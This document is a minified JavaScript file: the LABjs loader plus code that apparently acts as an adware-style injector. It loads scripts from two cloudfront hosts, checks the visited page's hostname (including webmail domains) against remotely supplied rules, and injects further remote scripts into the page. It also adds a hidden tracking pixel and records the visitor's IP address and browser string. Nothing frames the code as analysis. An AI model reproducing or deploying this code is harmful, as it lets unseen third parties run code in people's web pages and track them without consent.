if(window.self===window.top){(function(d){function t(a,c){var b=/^\w+\:\/\//;/^\/\/\/?/.test(a)?a=location.protocol+a:b.test(a)||"/"==a.charAt(0)||(a=(c||"")+a);return b.test(a)?a:("/"==a.charAt(0)?u:x)+a}function k(a,c){for(var b in a)a.hasOwnProperty(b)&&(c[b]=a[b]);return c}function a(a,c,b,h){a.onload=a.onreadystatechange=function(){a.readyState&&"complete"!=a.readyState&&"loaded"!=a.readyState||c[b]||(a.onload=a.onreadystatechange=null,h())}}function c(a){a.ready=a.finished=!0;for(var c=0;c<
a.finished_listeners.length;c++)a.finished_listeners[c]();a.ready_listeners=[];a.finished_listeners=[]}function n(c,k,b,h,d){setTimeout(function(){var e,m=k.real_src,f;if("item"in l){if(!l[0]){setTimeout(arguments.callee,25);return}l=l[0]}e=document.createElement("script");k.type&&(e.type=k.type);k.charset&&(e.charset=k.charset);d?v?(b.elem=e,y?(e.preload=!0,e.onpreload=h):e.onreadystatechange=function(){"loaded"==e.readyState&&h()},e.src=m):d&&0==m.indexOf(u)&&c[z]?(f=new XMLHttpRequest,f.onreadystatechange=
function(){4==f.readyState&&(f.onreadystatechange=function(){},b.text=f.responseText+"\n//@ sourceURL="+m,h())},f.open("GET",m),f.send()):(e.type="text/cache-script",a(e,b,"ready",function(){l.removeChild(e);h()}),e.src=m,l.insertBefore(e,l.firstChild)):(A&&(e.async=!1),a(e,b,"finished",h),e.src=m,l.insertBefore(e,l.firstChild))},0)}function q(){function r(e,p,b){function k(){null!=g&&(g=null,c(b))}var g;m[p.src].finished||(e[w]||(m[p.src].finished=!0),g=b.elem||document.createElement("script"),p.type&&
(g.type=p.type),p.charset&&(g.charset=p.charset),a(g,b,"finished",k),b.elem?b.elem=null:b.text?(g.onload=g.onreadystatechange=null,g.text=b.text):g.src=p.real_src,l.insertBefore(g,l.firstChild),b.text&&k())}function E(a,b,e,k){var g,s,d=function(){b.ready_cb(b,function(){r(a,b,g)})},h=function(){b.finished_cb(b,e)};b.src=t(b.src,a[B]);b.real_src=b.src+(a[C]?(/\?.*$/.test(b.src)?"&_":"?_")+~~(1E9*Math.random())+"=":"");m[b.src]||(m[b.src]={items:[],finished:!1});s=m[b.src].items;a[w]||0==s.length?
(g=s[s.length]={ready:!1,finished:!1,ready_listeners:[d],finished_listeners:[h]},n(a,b,g,k?function(){g.ready=!0;for(var a=0;a<g.ready_listeners.length;a++)g.ready_listeners[a]();g.ready_listeners=[]}:function(){c(g)},k)):(g=s[0],g.finished?h():g.finished_listeners.push(h))}function b(){function a(b,e){b.ready=!0;b.exec_trigger=e;c()}function b(a,e){a.ready=a.finished=!0;a.exec_trigger=null;for(var d=0;d<e.scripts.length;d++)if(!e.scripts[d].finished)return;e.finished=!0;c()}function c(){for(;f<d.length;)if("[object Function]"==
Object.prototype.toString.call(d[f]))try{d[f++]()}catch(a){}else{if(!d[f].finished){for(var b=d[f],e=!1,g=0;g<b.scripts.length;g++)b.scripts[g].ready&&b.scripts[g].exec_trigger&&(e=!0,b.scripts[g].exec_trigger(),b.scripts[g].exec_trigger=null);if(e)continue;break}f++}f==d.length&&(l=m=!1)}var e,g=k(h,{}),d=[],f=0,m=!1,l;e={script:function(){for(var c=0;c<arguments.length;c++){var f=arguments[c],h=arguments[c],q=void 0;"[object Array]"==Object.prototype.toString.call(f)||(h=[f]);for(var n=0;n<h.length;n++)l&&
l.scripts||d.push(l={scripts:[],finished:!0}),f=h[n],"[object Function]"==Object.prototype.toString.call(f)&&(f=f()),f&&("[object Array]"==Object.prototype.toString.call(f)?(q=[].slice.call(f),q.unshift(n,1),[].splice.apply(h,q),n--):("string"==typeof f&&(f={src:f}),f=k(f,{ready:!1,ready_cb:a,finished:!1,finished_cb:b}),l.finished=!1,l.scripts.push(f),E(g,f,l,u&&m),m=!0,g[D]&&e.wait()))}return e},wait:function(){if(0<arguments.length){for(var a=0;a<arguments.length;a++)d.push(arguments[a]);l=d[d.length-
1]}else l=!1;c();return e}};return{script:e.script,wait:e.wait,setOptions:function(a){k(a,g);return e}}}var h={},u=v||F,e=[],m={},f;h[z]=!0;h[D]=!1;h[w]=!1;h[C]=!1;h[B]="";return f={setGlobalDefaults:function(a){k(a,h);return f},setOptions:function(){return b().setOptions.apply(null,arguments)},script:function(){return b().script.apply(null,arguments)},wait:function(){return b().wait.apply(null,arguments)},queueScript:function(){e[e.length]={type:"script",args:[].slice.call(arguments)};return f},
queueWait:function(){e[e.length]={type:"wait",args:[].slice.call(arguments)};return f},runQueue:function(){for(var a=f,b=e.length,c;0<=--b;)c=e.shift(),a=a[c.type].apply(null,c.args);return a},noConflict:function(){d.$LAB=G;return f},sandbox:function(){return q()}}}var G=d.$LAB,z="UseLocalXHR",D="AlwaysPreserveOrder",w="AllowDuplicates",C="CacheBust",B="BasePath",x=/^[^?#]*\//.exec(location.href)[0],u=/^\w+\:\/\/\/?[^\/]+/.exec(x)[0],l=document.head||document.getElementsByTagName("head"),H=d.opera&&
"[object Opera]"==Object.prototype.toString.call(d.opera)||"MozAppearance"in document.documentElement.style,r=document.createElement("script"),y="boolean"==typeof r.preload,v=y||r.readyState&&"uninitialized"==r.readyState,A=!v&&!0===r.async,F=!v&&!A&&!H;d.$LAB=q();(function(a,c,b){null==document.readyState&&document[a]&&(document.readyState="loading",document[a](c,b=function(){document.removeEventListener(c,b,!1);document.readyState="complete"},!1))})("addEventListener","DOMContentLoaded")})(this);
var loadScripts=function(){window.lqwLab=$LAB.script(window.location.protocol+"//d1c299r1rms8s6.cloudfront.net/js/init2.js").wait().script(window.location.protocol+"//d38nxuujfh0i4p.cloudfront.net/sc/PT1311FA/usr2.js").wait(function(){window._lQw.g="1";window._lQw.ip="130.160.68.22";window._lQw.ua="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36";window._lQw.z=1391134548;window._lQw.cc="US";window._lQw.pid="2934";window._lQw.hn=document.location.hostname;window._lQw.hp=document.location.protocol;(function(){var d,t;window.lqFunc=t=function(){function d(a){this.doc_host=
document.location.hostname;this.doc_prot=document.location.protocol}d.prototype.is_bnd=function(a){var c,d;null==a&&(a=!1);a=RegExp("[.*+?()\\[\\]{}\\\\]","g");d=_lQw.regs.bn;c=this.doc_host;lqw(_lQw.dom.n).each(function(a,d){if(c.match(d))return!0});lqw(_lQw.dom.s).each(function(a,d){if(c.match(d))return!0});a=d.replace(a,"\\$&");return c.match(RegExp(a,"i"))?!0:!1};d.prototype.check_age=function(a){return(a||0)<(_lQw.z||99999)};d.prototype.get_lqd=function(a){return("https:"===a?_lQw.dom.s:_lQw.dom.n)[0]};
d.prototype.get_hst_s=function(){var a;a=this.doc_host;a.match(/\.mail\..*\.com$/)?a="all"+a.match(/\.mail\..*\.com$/):a.match(/\..*\.com\...$/)?a="all"+a.match(/\..*\.com$/):a.match(/\..*go\....$/)?a.match(/\..*go\....$/):a.match(/\..*\....$/)&&(a="all"+a.match(/\..*\....$/));return a};d.prototype.check_protocol=function(a){if("http:"===this.doc_prot){if("s"===a)return!1}else if("n"===a)return!1;return!0};d.prototype.check_domain=function(a){var c,d,k;k=RegExp("[.*+?()\\[\\]{}\\\\]","g");c=a.rx||
"*";d=a.rxb||"*";return"*"!==c&&(c="c"===c?a.rxc:_lQw.regs[a.rx],c=c.replace(k,"\\$&"),c=RegExp(c),!_lQw.hn.match(c))||"*"!==d&&(a="c"===d?a.rxbc:_lQw.regs[a.rxb],a=a.replace(k,"\\$&"),k=RegExp(a,"i"),_lQw.hn.match(k))?!1:!0};d.prototype.do_varz=function(a){a=a.replace("[lq_d]",this.get_lqd(document.location.protocol));a=a.replace("[lq_a]",_lQw.a);a=a.replace("[lq_g]",_lQw.g);a=a.replace("[lq_zh]",Math.round(_lQw.z/3600/24));a=a.replace("[lq_sk]",_lQw.sk.replace("/",""));a=a.replace("[loc_hn]",this.doc_host);
return a=a.replace("[loc_hs]",this.get_hst_s)};return d}();d=new t;d.is_bnd()||(lqw(_lQw.scps).each(function(k,a){var c;c=!0;d.check_age(a.ag)||(c=!1);d.check_domain(a)||(c=!1);d.check_protocol(a.pr)||(c=!1);if(c)return c=d.do_varz(a.loc),$LAB.queueScript(_lQw.hp+"//"+c)}),$LAB.runQueue())}).call(this);lqw("body").append("<img src='"+document.location.protocol+"//trk.lqw.me/px/boot.gif?u=1&z=1391134548&s=PT1311FA&p=2934&cc=US' width='0' height='0' />")})};if(""==location.port)try{var apid=localStorage.getItem("_adpk-pid"),
nv=0,vp="5487 2048 6504 2933 3245 4222 6232 4911 5802 2934 8273 7825".split(" ");if(apid){var cv=vp.indexOf(apid);this.nv=vp.indexOf("2934");if(0<=cv&&cv<=vp.length&&0<=nv&&nv<=vp.length)if(nv>=cv)loadScripts(),localStorage.setItem("_adpk-pid","2934"),localStorage.setItem("_adpk-rst",0);else{var rst=localStorage.getItem("_adpk-rst");rst?localStorage.setItem("_adpk-rst",rst+1):localStorage.setItem("_adpk-rst",1);1<rst&&(loadScripts(),localStorage.clear("_adpk-pid"))}else loadScripts()}else loadScripts(),
"undefined"!=typeof nv&&(0<=nv&&nv<=vp.length)&&localStorage.setItem("_adpk-pid","2934")}catch(err$$1){loadScripts()}};
